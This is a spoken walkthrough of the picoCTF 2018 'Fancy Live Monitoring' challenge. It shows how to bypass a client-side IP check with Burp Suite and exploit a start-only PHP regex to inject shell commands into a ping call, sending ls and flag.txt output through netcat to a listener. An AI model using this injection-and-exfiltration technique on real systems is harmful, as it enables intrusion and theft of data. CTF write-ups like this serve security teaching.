This is Martin Carlisle with Fancy Live Monitoring from pico2018 2018. One of my schoolmates developed a live monitoring tool. Can you get a flag from port 31070? And there's a hint, the application uses the validation check on both the client side and the server side, but the server check seems to be inappropriate. You should be able to listen through the shell on the server. Okay, so if I'm going to need to deal with a client side check, I can deal with that by using Burp Suite. So I'm going to create a proxy, and that proxy is going to listen and intercept requests between me and the web server. And it's running on port 8080, so I'm going to come here into Firefox, go to Options, and I'm going to set a manual proxy. Port 8080. Okay, we'll just make sure that works. And there. Okay. And CNN has actually detected the proxy, so that's exciting. Okay, so I've got this nice proxy server running. I'm going to be able to intercept the traffic, and now I'll be able to go through and visit that website and watch the traffic. Okay, so we'll come over here, we'll click on the link, go ahead and forward that request through the proxy, and it's going to ask for the input IP address of the target host. We have the source code. And the source code does a script, so that's the client side that we're going to avoid. And that checks for 3 digits, period, 1 to 3 digits, period, 1 to 3 digits, 1 to 3 digits. So it's really looking for an IP address. The caret matches the beginning, the dollar matches the end. Now on the PHP side, they're only matching the beginning. So if we put in a valid IP address, we're going to be able to put whatever we want afterwards. We're not going to get much of a result back, so we're going to get 100% packet loss or 0% packet loss. But we'll get the ability to run an arbitrary command of our choosing along with this ping. So what I'm going to do is I'm going to set up a listener using netcat. That's going to listen on port 9000. Then I'll come to here. I can put in localhost. That's going to get past the client side filter, but I can modify the request as it goes forward. And I clicked a little too fast there, so I'm going to need to do that again. And I'll say ls to see the files, and I'll pipe that to netcat. %20 is a space in a web request, so %20 localhost %20 9000. And I can look and see that here's the files that are there. Flag.txt is the one that I want. So I'm going to do this again. This time, I'll say cat %20 for space flag.txt, pipe to netcat to %20 localhost 9000. And there's my flag, pico CTF never trust a box.